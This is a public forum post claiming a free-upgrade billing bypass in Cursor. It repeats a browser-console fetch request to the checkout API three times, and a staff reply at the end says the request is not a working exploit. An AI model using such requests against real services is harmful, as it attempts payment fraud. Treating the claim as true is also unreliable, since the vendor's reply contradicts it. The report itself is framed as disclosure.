URGENT SECURITY ALERT: 100% Free Billing Bypass Actively Abused via Alipay

Where does the bug appear (feature/product)?

Somewhere else…

Describe the Bug

Hello Cursor Team,

I am writing to report a critical billing bypass vulnerability I have discovered regarding the subscription upgrade process.

It appears that users can bypass the payment gateway entirely and upgrade to the “Ultra” tier for free by directly sending a specific POST request to your checkout API. This issue seems to be particularly exploited by users utilizing Alipay in the Chinese region.

Vulnerability Details:
Users can open the developer console on the dashboard and execute the following JavaScript code to instantly trigger the bug without any actual payment being processed:

JavaScript
fetch('https://cursor.com/api/checkout', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({
    tier: 'ultra',
    allowAutomaticPayment: true,
    yearly: false
  })
});
Impact:
This method is currently being heavily abused to gain unauthorized access to premium features, leading to direct financial loss for your company.

Suggested Mitigation:
Please implement strict server-side validation to ensure that a successful payment callback from the payment provider (e.g., Alipay, Stripe) has been received and verified before provisioning the “Ultra” tier to any user account.

I highly recommend investigating this endpoint and patching it as soon as possible.

Best regards,

Steps to Reproduce

fetch('https://cursor.com/api/checkout', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({
    tier: 'ultra',
    allowAutomaticPayment: true,
    yearly: false
  })
});

Operating System

Windows 10/11

Version Information

Kind people

Does this stop you from using Cursor

No - Cursor works, but with this issue

Vulnerability Details & Steps to Reproduce: I have identified that this bypass has a specific prerequisite tied to the Alipay payment gateway. Users are executing the following steps:

Step 1: The user must first purchase a “Pro” plan using Alipay (a Chinese payment method).
Step 2: Once the Pro plan is active, the user goes to their dashboard and opens the browser’s developer console.
Step 3: The user executes the following JavaScript code to hit the checkout API directly:

JavaScript

fetch('https://cursor.com/api/checkout', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({
    tier: 'ultra',
    allowAutomaticPayment: true,
    yearly: false
  })
});

Result: The system instantly upgrades the account to the “Ultra” tier without charging the price difference or triggering any further payment validation.

Hey, thanks for the report, but the scenario you described isn’t a working exploit. The /api/checkout endpoint doesn’t provision subscriptions directly. It either creates a Stripe Checkout session, which requires a real payment, or it triggers an internal flow that requires an existing subscription and a valid payment method. A simple POST request can’t bypass payment.

If you’ve actually found a security issue, the right channel is [email protected], not a public forum. Posting detailed steps, even if they don’t work, goes against our community guidelines.

I’m closing this thread. If you have concrete proof of a working exploit, please email [email protected].